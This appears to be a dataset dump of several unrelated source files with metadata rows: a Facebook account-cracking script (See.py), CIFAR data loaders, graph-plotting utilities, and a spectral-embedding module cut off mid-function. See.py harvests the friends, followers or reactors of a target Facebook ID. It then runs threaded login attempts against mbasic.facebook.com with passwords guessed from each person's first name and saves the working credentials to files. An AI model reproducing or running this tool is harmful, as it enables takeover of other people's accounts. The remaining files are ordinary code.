| 0.579487
| 0
| 0.005128
| 0.148403
| 0.01052
| 0
| 0
| 0
| 0
| 0.123077
| 1
| 0.25641
| false
| 0
| 0.035897
| 0.112821
| 0.425641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
1e099f2cc4f6249433a54cd1c87dfa8270afcc99
| 13,081
|
py
|
Python
|
See.py
|
Em710/SeeYou
|
ad4db2efe9f5f9e2befb067d6387d2d1bc8143b3
|
[
"Apache-2.0"
] | null | null | null |
See.py
|
Em710/SeeYou
|
ad4db2efe9f5f9e2befb067d6387d2d1bc8143b3
|
[
"Apache-2.0"
] | null | null | null |
See.py
|
Em710/SeeYou
|
ad4db2efe9f5f9e2befb067d6387d2d1bc8143b3
|
[
"Apache-2.0"
] | null | null | null |
#ZeeSeeYou
import requests
import sys
import os
import subprocess
import random
import time
import re
import json
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from datetime import datetime
try:
import requests
except ImportError:
os.system("pip2 install requests")
# Module-level state shared by the menu/cracking routines.
loop = 0
ok = []
cp = []
# NOTE(review): `id` shadows the Python builtin of the same name.
id = []
# Spoofed mobile Facebook user agent used for requests.
ua = ("Mozilla/5.0 (Linux; Android 4.1.3; GT-I8190N Build/GRK39F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]")
s = requests.Session()
ct = datetime.now()
n = ct.month
# Indonesian month names, indexed by month - 1.
bulan = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'Nopember', 'Desember']
try:
    # NOTE(review): `n` is always 1-12 here and the body cannot raise
    # ValueError, so both exit() paths are effectively dead code.
    if n < 0 or n > 12:
        exit()
    nTemp = n - 1
except ValueError:
    exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
# Current month name (unused in the visible portion of the file).
op = bulan[nTemp]
def logo():
os.system("clear")
print(" \033[0;91m___ ___ __ __ ___ ___ \n \033[0;91m/ __|_ _| \/ | _ ) __| \033[0;96mAU\033[0;97m : ANGGA KURNIAWAN\n\033[0;97m \__ \| || |\/| | _ \ _| \033[0;91mFB\033[0;97m : FB.ME/GAAAARZXD\n\033[0;97m |___/___|_| |_|___/_| \033[0;93mGH\033[0;97m : GITHUB.COM/ANGGAXD")
def tokenz():
os.system('clear')
print logo
token = raw_input(" Paste Access Token Here: ")
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + token)
a = json.loads(otw.text)
nama = a['name']
zedd = open('login.txt', 'w')
zedd.write(token)
zedd.close()
print '\x1b[1;92m[\xe2\x9c\x93] Login Success {^_^} '
os.system('xdg-open https://m.facebook.com/Kudiyan.Da.Prince')
time.sleep(1)
menu()
except KeyError:
print '\x1b[1;91m[!] Token Wrong !'
time.sleep(1.7)
tokenz()
def menu():
os.system('clear')
try:
token = open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
loop()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+token)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
username = a['username']
ip = requests.get('https://api-asutoolkit.cloudaccess.host/ip.php').text
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + token)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
tokenz()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mConnection Error"
loop()
logo()
print(" \033[0;97m[\033[0;96m+\033[0;97m] User Active : %s"%(nama))
print(" \033[0;97m[\033[0;96m+\033[0;97m] IP Address : "+ip)
print(" \033[0;97m[\033[0;93m#\033[0;97m] --------------------------------------------")
print(" \033[0;97m[\033[0;96m1\033[0;97m] Crack From Public FriendList")
print(" \033[0;97m[\033[0;96m2\033[0;97m] Crack From Follower")
print(" \033[0;97m[\033[0;96m3\033[0;97m] Crack From Reaction")
print(" \033[0;97m[\033[0;91m0\033[0;97m] Logout (delete token)")
ask = raw_input("\n \033[0;97m[\033[0;93m?\033[0;97m] Choose : ")
if ask =="":
menu()
elif ask == "1" or ask == "01":
public()
elif ask == "2" or ask == "02":
followers()
elif ask == "3" or ask == "03":
reaction()
elif ask == "0" or ask == "00":
os.system("rm -f login.txt")
exit(" \033[0;97m[\033[0;96m#\033[0;97m] Successfully Delete Token")
else:
menu()
def public():
global token
try:
token = open('login.txt', 'r').read()
except IOError:
print(' \033[0;97m[\033[0;91m!\033[0;97m] Token Invalid')
tokenz()
print("\n \033[0;97m[\033[0;93m*\033[0;97m] Fill In 'me' To Crack From The Friends List")
idt = raw_input(" \033[0;97m[\033[0;92m+\033[0;97m] ID Public : ")
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
sp = json.loads(pok.text)
#print(" \033[0;97m[\033[0;92m+\033[0;97m] Name : "+sp["name"])
except KeyError:
exit(' \033[0;97m[\033[0;91m!\033[0;97m] ID Public Not Found')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token)
z = json.loads(r.text)
for i in z["data"]:
uid = i['id']
na = i['name']
nm = na.rsplit(" ")[0]
id.append(uid+'|'+nm)
print(" \033[0;97m[\033[0;93m*\033[0;97m] Total ID : \033[0;91m"+str(len(id)))
ask = raw_input("\n \033[0;97m[\033[0;93m?\033[0;97m] Want to Use a Manual Password? Y/t : ")
if ask == "Y" or ask == "y":
manual()
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;92mOK\033[0;97m Saved In : results/OK-%s-%s-%s.txt"% (ha, op, ta))
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;93mCP\033[0;97m Saved In : results/CP-%s-%s-%s.txt\n"% (ha, op, ta))
def main(user):
global loop, token, ips
print'\r \x1b[0;97m[\x1b[0;96m%s\x1b[0;97m] Cracking %s/%s - OK-:%s - CP-:%s ' % (datetime.now().strftime('%H:%M:%S'), loop, len(id), len(ok), len(cp)),
sys.stdout.flush()
uid,name=user.split("|")
try:
os.mkdir('results')
except OSError:
pass
try:
for pw in [name.lower()+'123',name.lower()+'1234',name.lower()+'12345',name.lower()]:
rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pw, 'login': 'submit'}, headers={'user-agent': ua})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print('\r \033[0;92m* --> ' +uid+ '|' + pw + ' ')
ok.append(uid+'|'+pw)
save = open('results/OK-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
elif 'checkpoint' in xo:
print('\r \033[0;93m* --> ' +uid+ '|' + pw + ' ')
cp.append(uid+'|'+pw)
save = open('results/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
loop += 1
except:
pass
p = ThreadPool(30)
p.map(main, id)
exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")
def followers():
global token
try:
token = open('login.txt', 'r').read()
except IOError:
print(' \033[0;97m[\033[0;91m!\033[0;97m] Token Invalid')
tokenz()
print("\n \033[0;97m[\033[0;93m*\033[0;97m] Fill In 'me' To Crack From The Followers")
idt = raw_input(" \033[0;97m[\033[0;92m+\033[0;97m] ID Public : ")
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
sp = json.loads(pok.text)
#print(" \033[0;97m[\033[0;92m+\033[0;97m] Name : "+sp["name"])
except KeyError:
exit(' \033[0;97m[\033[0;91m!\033[0;97m] ID Public Not Found')
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=5000&access_token="+token)
z = json.loads(r.text)
for i in z["data"]:
uid = i['id']
na = i['name']
nm = na.rsplit(" ")[0]
id.append(uid+'|'+nm)
print(" \033[0;97m[\033[0;93m*\033[0;97m] Total ID : \033[0;91m"+str(len(id)))
ask = raw_input("\n \033[0;97m[\033[0;93m?\033[0;97m] Want to Use a Manual Password? Y/t : ")
if ask == "Y" or ask == "y":
manual()
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;92mOK\033[0;97m Saved In : results/OK-%s-%s-%s.txt"% (ha, op, ta))
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;93mCP\033[0;97m Saved In : results/CP-%s-%s-%s.txt\n"% (ha, op, ta))
def main(user):
global loop, token
print '\r \x1b[0;97m[\x1b[0;96m%s\x1b[0;97m] Cracking %s/%s - OK-:%s - CP-:%s ' % (datetime.now().strftime('%H:%M:%S'), loop, len(id), len(ok), len(cp)),
sys.stdout.flush()
uid,name=user.split("|")
try:
os.mkdir('results')
except OSError:
pass
try:
for pw in [name.lower()+'123',name.lower()+'1234',name.lower()+'12345',name.lower()]:
rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pw, 'login': 'submit'}, headers={'user-agent': ua})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print('\r \033[0;92m* --> ' +uid+ '|' + pw + ' ')
ok.append(uid+'|'+pw)
save = open('results/OK-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
elif 'checkpoint' in xo:
print('\r \033[0;93m* --> ' +uid+ '|' + pw + ' ')
cp.append(uid+'|'+pw)
save = open('results/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
loop += 1
except:
pass
p = ThreadPool(30)
p.map(main, id)
exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")
def reaction():
global token
try:
token = open('login.txt', 'r').read()
except IOError:
print(' \033[0;97m[\033[0;91m!\033[0;97m] Token Invalid')
tokenz()
print("\n \033[0;97m[\033[0;93m*\033[0;97m] Fill In 'me' To Crack From The Friends List")
idt = raw_input(" \033[0;97m[\033[0;92m+\033[0;97m] ID Public : ")
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
sp = json.loads(pok.text)
#print(" \033[0;97m[\033[0;92m+\033[0;97m] Name : "+sp["name"])
except KeyError:
exit(' \033[0;97m[\033[0;91m!\033[0;97m] ID Public Not Found')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token)
z = json.loads(r.text)
for i in z["data"]:
uid = i['id']
na = i['name']
nm = na.rsplit(" ")[0]
id.append(uid+'|'+nm)
print(" \033[0;97m[\033[0;93m*\033[0;97m] Total ID : \033[0;91m"+str(len(id)))
ask = raw_input("\n \033[0;97m[\033[0;93m?\033[0;97m] Want to Use a Manual Password? Y/t : ")
if ask == "Y" or ask == "y":
manual()
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;92mOK\033[0;97m Saved In : results/OK-%s-%s-%s.txt"% (ha, op, ta))
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;93mCP\033[0;97m Saved In : results/CP-%s-%s-%s.txt\n"% (ha, op, ta))
def main(user):
global loop, token
print'\r \x1b[0;97m[\x1b[0;96m%s\x1b[0;97m] Cracking %s/%s - OK-:%s - CP-:%s ' % (datetime.now().strftime('%H:%M:%S'), loop, len(id), len(ok), len(cp)),
sys.stdout.flush()
uid,name=user.split("|")
try:
os.mkdir('results')
except OSError:
pass
try:
for pw in [name.lower()+'123',name.lower()+'1234',name.lower()+'12345',name.lower()]:
rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pw, 'login': 'submit'}, headers={'user-agent': ua})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print('\r \033[0;92m* --> ' +uid+ '|' + pw + ' ')
ok.append(uid+'|'+pw)
save = open('results/OK-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
elif 'checkpoint' in xo:
print('\r \033[0;93m* --> ' +uid+ '|' + pw + ' ')
cp.append(uid+'|'+pw)
save = open('results/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
loop += 1
except:
pass
p = ThreadPool(30)
p.map(main, id)
exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")
def manual():
print(" \033[0;97m[\033[0;93m*\033[0;97m] Example : bismillah,123456,indonesia")
pw = raw_input(" \033[0;97m[\033[0;93m?\033[0;97m] Sett Password : ").split(",")
if len(pw) ==0:
exit(" \033[0;97m[\033[0;91m!\033[0;97m] Don't Be Empty")
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;92mOK\033[0;97m Saved In : results/OK-%s-%s-%s.txt"% (ha, op, ta))
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;93mCP\033[0;97m Saved In : results/CP-%s-%s-%s.txt\n"% (ha, op, ta))
def main(user):
global loop, token
print'\r \x1b[0;97m[\x1b[0;96m%s\x1b[0;97m] Cracking %s/%s - OK-:%s - CP-:%s ' % (datetime.now().strftime('%H:%M:%S'), loop, len(id), len(ok), len(cp)),
sys.stdout.flush()
uid,name=user.split("|")
try:
os.mkdir('results')
except OSError:
pass
try:
for asu in pw:
rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': asu, 'login': 'submit'}, headers={'user-agent': ua})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print('\r \033[0;92m* --> ' +uid+ '|' + asu + ' ')
ok.append(uid+'|'+asu)
save = open('results/OK-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(asu)+'\n')
save.close()
break
continue
elif 'checkpoint' in xo:
print('\r \033[0;93m* --> ' +uid+ '|' + asu + ' ')
cp.append(uid+'|'+asu)
save = open('results/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(asu)+'\n')
save.close()
break
continue
loop += 1
except:
pass
p = ThreadPool(30)
p.map(main, id)
exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")
if __name__ == '__main__':
os.system("git pull")
tokenz()
menu()
| 35.740437
| 282
| 0.581378
| 2,177
| 13,081
| 3.458429
| 0.129995
| 0.09138
| 0.095763
| 0.062425
| 0.778058
| 0.767433
| 0.749502
| 0.736486
| 0.736486
| 0.72586
| 0
| 0.116808
| 0.179956
| 13,081
| 365
| 283
| 35.838356
| 0.585066
| 0.014907
| 0
| 0.729412
| 0
| 0.138235
| 0.435569
| 0.186695
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.047059
| 0.038235
| null | null | 0.129412
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e12a229461df5bda1eadae17d320ce3fe74360e
| 4,324
|
py
|
Python
|
mywork/data_providers/cifar.py
|
notreal1995/once-for-all
|
be6b47173e8d365e0712bade60a7cc6495e65d8e
|
[
"Apache-2.0"
] | null | null | null |
mywork/data_providers/cifar.py
|
notreal1995/once-for-all
|
be6b47173e8d365e0712bade60a7cc6495e65d8e
|
[
"Apache-2.0"
] | null | null | null |
mywork/data_providers/cifar.py
|
notreal1995/once-for-all
|
be6b47173e8d365e0712bade60a7cc6495e65d8e
|
[
"Apache-2.0"
] | null | null | null |
import torchvision
import torch.utils.data
import torchvision.transforms as transforms
"""
CIFAR-10 and CIFAR-100 can be automatically download
CINIC-10 is available from https://github.com/BayesWatch/cinic-10
"""
class CIFAR10DataProvider:
    """Wrap torchvision CIFAR-10 in train/test DataLoaders.

    Exposes ``self.train`` and ``self.test`` loaders. Several constructor
    arguments (valid_size, resize_scale, distort_color, num_replicas, rank)
    are accepted for interface compatibility but unused here.
    """

    def __init__(self, save_path=None, train_batch_size=96,
                 test_batch_size=256, valid_size=None,
                 n_worker=2, resize_scale=0.08, distort_color=None,
                 image_size=224, num_replicas=None, rank=None):
        mean = [0.49139968, 0.48215827, 0.44653124]
        std = [0.24703233, 0.24348505, 0.26158768]
        normalize = transforms.Normalize(mean, std)

        # Training pipeline: random crop + horizontal flip augmentation.
        augment = transforms.Compose([
            # transforms.Resize(image_size, interpolation=3), # BICUBIC interpolation
            transforms.RandomResizedCrop(image_size),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            normalize,
        ])
        # Evaluation pipeline: deterministic resize only.
        plain = transforms.Compose([
            transforms.Resize(image_size, interpolation=3),  # BICUBIC interpolation
            transforms.ToTensor(),
            normalize,
        ])

        train_set = torchvision.datasets.CIFAR10(
            root=save_path, train=True, download=True, transform=augment)
        test_set = torchvision.datasets.CIFAR10(
            root=save_path, train=False, download=True, transform=plain)

        # NOTE(review): shuffle=False on the training loader mirrors the
        # original behaviour — confirm shuffling was intentionally disabled.
        self.train = torch.utils.data.DataLoader(
            train_set, batch_size=train_batch_size, shuffle=False,
            pin_memory=True, num_workers=n_worker)
        self.test = torch.utils.data.DataLoader(
            test_set, batch_size=test_batch_size, shuffle=False,
            pin_memory=True, num_workers=n_worker)
class CIFAR100DataProvider:
    """Wrap torchvision CIFAR-100 in train/test DataLoaders.

    Mirrors CIFAR10DataProvider but loads the 100-class dataset. Several
    constructor arguments (valid_size, resize_scale, distort_color,
    num_replicas, rank) are accepted for interface compatibility but unused.
    """

    def __init__(self, save_path=None, train_batch_size=96,
                 test_batch_size=256, valid_size=None,
                 n_worker=2, resize_scale=0.08, distort_color=None,
                 image_size=224, num_replicas=None, rank=None):
        mean = [0.49139968, 0.48215827, 0.44653124]
        std = [0.24703233, 0.24348505, 0.26158768]
        normalize = transforms.Normalize(mean, std)

        # Training pipeline: random crop + horizontal flip augmentation.
        augment = transforms.Compose([
            # transforms.Resize(image_size, interpolation=3), # BICUBIC interpolation
            transforms.RandomResizedCrop(image_size),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            normalize,
        ])
        # Evaluation pipeline: deterministic resize only.
        plain = transforms.Compose([
            transforms.Resize(image_size, interpolation=3),  # BICUBIC interpolation
            transforms.ToTensor(),
            normalize,
        ])

        train_set = torchvision.datasets.CIFAR100(
            root=save_path, train=True, download=True, transform=augment)
        test_set = torchvision.datasets.CIFAR100(
            root=save_path, train=False, download=True, transform=plain)

        # NOTE(review): shuffle=False on the training loader mirrors the
        # original behaviour — confirm shuffling was intentionally disabled.
        self.train = torch.utils.data.DataLoader(
            train_set, batch_size=train_batch_size, shuffle=False,
            pin_memory=True, num_workers=n_worker)
        self.test = torch.utils.data.DataLoader(
            test_set, batch_size=test_batch_size, shuffle=False,
            pin_memory=True, num_workers=n_worker)
#
#
# class CINIC10DataProvider:
#
# def __init__(self, save_path=None, train_batch_size=96,
# test_batch_size=256, valid_size=None,
# n_worker=2, resize_scale=0.08, distort_color=None,
# image_size=224, num_replicas=None, rank=None):
#
# norm_mean = [0.47889522, 0.47227842, 0.43047404]
# norm_std = [0.24205776, 0.23828046, 0.25874835]
#
# valid_transform = transforms.Compose([
# transforms.Resize(image_size, interpolation=3), # BICUBIC interpolation
# transforms.ToTensor(),
# transforms.Normalize(norm_mean, norm_std),
# ])
#
# valid_data = torchvision.datasets.ImageFolder(
# save_path + 'test', transform=valid_transform)
#
# self.test = torch.utils.data.DataLoader(
# valid_data, batch_size=test_batch_size, shuffle=False,
# pin_memory=True, num_workers=n_worker)
| 39.669725
| 87
| 0.650324
| 483
| 4,324
| 5.567288
| 0.186335
| 0.053552
| 0.031238
| 0.066939
| 0.864262
| 0.864262
| 0.864262
| 0.864262
| 0.853105
| 0.851246
| 0
| 0.070701
| 0.250925
| 4,324
| 108
| 88
| 40.037037
| 0.759494
| 0.215079
| 0
| 0.847458
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033898
| false
| 0
| 0.050847
| 0
| 0.118644
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e35dfac02da901c4414735877fe62b2200ca011
| 91
|
py
|
Python
|
behavior_circuits/__init__.py
|
behavior-circuits/python_library
|
4b04b8187e642dea345395924e83c39a08228f47
|
[
"MIT"
] | null | null | null |
behavior_circuits/__init__.py
|
behavior-circuits/python_library
|
4b04b8187e642dea345395924e83c39a08228f47
|
[
"MIT"
] | null | null | null |
behavior_circuits/__init__.py
|
behavior-circuits/python_library
|
4b04b8187e642dea345395924e83c39a08228f47
|
[
"MIT"
] | null | null | null |
from behavior_circuits.basic_gates import *
from behavior_circuits.normalizations import *
| 30.333333
| 46
| 0.868132
| 11
| 91
| 6.909091
| 0.636364
| 0.315789
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087912
| 91
| 2
| 47
| 45.5
| 0.915663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1e6aad70c3bec68cdc58b4895e4d5c22a1ed1404
| 5,075
|
py
|
Python
|
magellan/analysis.py
|
ajdegol/magellan
|
f580602df33446317da0f80277c87dc3646c739a
|
[
"MIT"
] | 5
|
2015-09-07T13:00:39.000Z
|
2021-01-18T03:07:51.000Z
|
magellan/analysis.py
|
ajdegol/magellan
|
f580602df33446317da0f80277c87dc3646c739a
|
[
"MIT"
] | 1
|
2015-09-07T12:58:32.000Z
|
2015-09-07T12:58:32.000Z
|
magellan/analysis.py
|
ajdegol/magellan
|
f580602df33446317da0f80277c87dc3646c739a
|
[
"MIT"
] | 2
|
2017-05-21T16:37:12.000Z
|
2018-02-05T14:29:41.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Package contains numerous analysis routines and links to third party libraries
in order to analyse and explore packages for Magellan.
NB: This module is likely to be removed from Magellan in the near future.
"""
def write_dot_graph_to_disk_with_distance_colour(
        venv, filename, distances, inc_dist_labels=True):
    """
    Create dot graph with colours.

    :param Environment venv: virtual env containing nodes and edges
    :param str filename: output filename
    :param dict distances: (nodes:values) giving values to be used in colouring
    :param bool inc_dist_labels=True: include value of distances on node-label
    """
    node_template = 'n{}'
    # Map (lower-cased name, version) -> dot node id; "n0" is reserved for root.
    node_index = {(venv.nodes[x][0].lower(), venv.nodes[x][1]):
                  node_template.format(x+1)
                  for x in range(len(venv.nodes))}
    node_index[('root', '0.0.0')] = node_template.format(0)

    # Fill in nodes
    node_template = '    {0} [label="{1}{2}];\n'
    colour_bit_template = '", style=filled, color="{0} {1} {2}"'
    dist_lookup = {k[0].lower(): distances[k] for k in distances}

    # Fix: open in text mode — the function writes str, which raises
    # TypeError with the original 'wb' binary mode on Python 3.
    with open(filename, 'w') as f:
        f.write('digraph magout {\n')

        # NODES
        orig_col_bit = colour_bit_template.format(0.25, 0.25, 0.25)
        f.write(node_template.format("n0", "root", orig_col_bit))

        max_col = max(distances.values())
        if max_col <= 0:
            max_col = 1.0  # avoid division by zero when all distances are 0

        for n in node_index:
            n_key = n[0].lower()
            if n_key in dist_lookup:
                # Hue scaled by distance; strings truncated to 5 chars for dot.
                colour_bit = colour_bit_template.format(
                    str(1-0.5*dist_lookup[n_key]/max_col)[0:5], 1.0, 1.0)
                if inc_dist_labels:
                    colour_bit = ('\n dist: ' + str(dist_lookup[n_key])[0:5]
                                  + colour_bit)
            else:
                colour_bit = orig_col_bit
            f.write(node_template.format(node_index[n], n, colour_bit))

        # EDGES
        for e in venv.edges:
            from_e = (e[0][0].lower(), e[0][1])
            to_e = (e[1][0].lower(), e[1][1])
            try:
                f.write("    {0} -> {1};\n"
                        .format(node_index[from_e], node_index[to_e]))
            except KeyError:
                pass  # don't write edge if either endpoint is unindexed.
        f.write('}')
def write_dot_graph_subset(
        venv, filename, distances, inc_dist_labels=True):
    """
    Create dot graph with colours; truncated to only include those nodes
    in "distances"

    :param Environment venv: virtual env containing nodes and edges
    :param str filename: output filename
    :param dict distances: (nodes:values) giving values used in colouring
    :param bool inc_dist_labels=True: include value of distances on node-label
    """
    dist_lookup = {k[0].lower(): distances[k] for k in distances}

    # reduce nodes and edges to only include distances:
    node_template = 'n{}'
    node_index = {(venv.nodes[x][0].lower(), venv.nodes[x][1]):
                  node_template.format(x+1)
                  for x in range(len(venv.nodes))
                  if venv.nodes[x][0].lower() in dist_lookup}
    node_index[('root', '0.0.0')] = node_template.format(0)
    edge_index = [e for e in venv.edges if e[0][0].lower() in dist_lookup
                  and e[1][0].lower() in dist_lookup]

    # Templates:
    node_template = '    {0} [label="{1}{2}];\n'
    colour_bit_template = '", style=filled, color="{0} {1} {2}"'

    # Fix: open in text mode — the function writes str, which raises
    # TypeError with the original 'wb' binary mode on Python 3.
    with open(filename, 'w') as f:
        f.write('digraph magout {\n')

        # NODES
        orig_col_bit = colour_bit_template.format(0.25, 0.25, 0.25)
        f.write(node_template.format("n0", "root", orig_col_bit))

        max_col = max(distances.values())
        # Fix: guard against division by zero (the sibling
        # write_dot_graph_to_disk_with_distance_colour already does this).
        if max_col <= 0:
            max_col = 1.0

        for n in node_index:
            n_key = n[0]
            if n_key in dist_lookup:
                colour_bit = colour_bit_template.format(
                    str(1-0.5*dist_lookup[n_key]/max_col)[0:5], 1.0, 1.0)
                if inc_dist_labels:
                    colour_bit = ('\n dist: ' + str(dist_lookup[n_key])[0:5]
                                  + colour_bit)
            else:
                colour_bit = orig_col_bit
            f.write(node_template.format(node_index[n], n, colour_bit))

        # EDGES
        for e in edge_index:
            from_e = (e[0][0].lower(), e[0][1])
            to_e = (e[1][0].lower(), e[1][1])
            try:
                f.write("    {0} -> {1};\n"
                        .format(node_index[from_e], node_index[to_e]))
            except KeyError:
                pass  # don't write edge if either endpoint is unindexed.
        f.write('}')
def print_pdp_tree_parsed(pdp_tree_parsed):
    """Pretty-print the nodes and dependencies of a parsed pipdeptree.

    :param dict pdp_tree_parsed: expects 'nodes' (iterable) and
        'dependencies' (mapping node -> iterable of deps) keys.
    """
    print("pipdeptree nodes:")
    for node in pdp_tree_parsed['nodes']:
        print(node)

    print("pipdeptree deps:")
    deps = pdp_tree_parsed['dependencies']
    for node in deps:
        print('-' * 72)  # visual separator between nodes
        print(node)
        for dep in deps[node]:
            print(dep)
| 34.060403
| 79
| 0.563547
| 724
| 5,075
| 3.767956
| 0.180939
| 0.052786
| 0.052786
| 0.024927
| 0.804619
| 0.758065
| 0.744135
| 0.744135
| 0.734604
| 0.719208
| 0
| 0.029187
| 0.304631
| 5,075
| 148
| 80
| 34.290541
| 0.743837
| 0.213793
| 0
| 0.752941
| 0
| 0
| 0.081178
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035294
| false
| 0.023529
| 0
| 0
| 0.035294
| 0.082353
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e9151ec3acc9c4bea1f71de4b72ab8e0989a6b1
| 10,030
|
py
|
Python
|
spectral_embedding/network_generation.py
|
iggallagher/Spectral-Embedding
|
d0ce5a277dca239341bfa133e8cd94e8bff7830a
|
[
"MIT"
] | null | null | null |
spectral_embedding/network_generation.py
|
iggallagher/Spectral-Embedding
|
d0ce5a277dca239341bfa133e8cd94e8bff7830a
|
[
"MIT"
] | null | null | null |
spectral_embedding/network_generation.py
|
iggallagher/Spectral-Embedding
|
d0ce5a277dca239341bfa133e8cd94e8bff7830a
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.stats as stats
def symmetrises(A, diag=False):
    """Return a symmetric matrix built from the lower triangle of A.

    The strict lower triangle is mirrored onto the upper triangle. When
    ``diag`` is True the diagonal of A is kept; otherwise it is zeroed.
    """
    lower = np.tril(A, 0) if diag else np.tril(A, -1)
    return lower + np.tril(A, -1).T
def generate_B(K, rho=1):
    """Sample a symmetric K-by-K block matrix with entries uniform on [0, rho]."""
    raw = stats.uniform.rvs(size=(K, K))
    return symmetrises(rho * raw, diag=True)
def generate_SBM(n, B, pi):
    """Sample an adjacency matrix and labels from a stochastic block model.

    :param n: number of nodes
    :param B: K-by-K inter-block edge-probability matrix
    :param pi: length-K block membership probabilities
    :return: (A, Z) symmetric adjacency matrix and node block labels
    """
    K = len(pi)
    if B.shape[0] != K or B.shape[1] != K:
        raise ValueError('B must be a square matrix size K-by-K')
    Z = np.random.choice(range(K), p=pi, size=n)
    edge_probs = B[Z, :][:, Z]  # per-pair Bernoulli probabilities
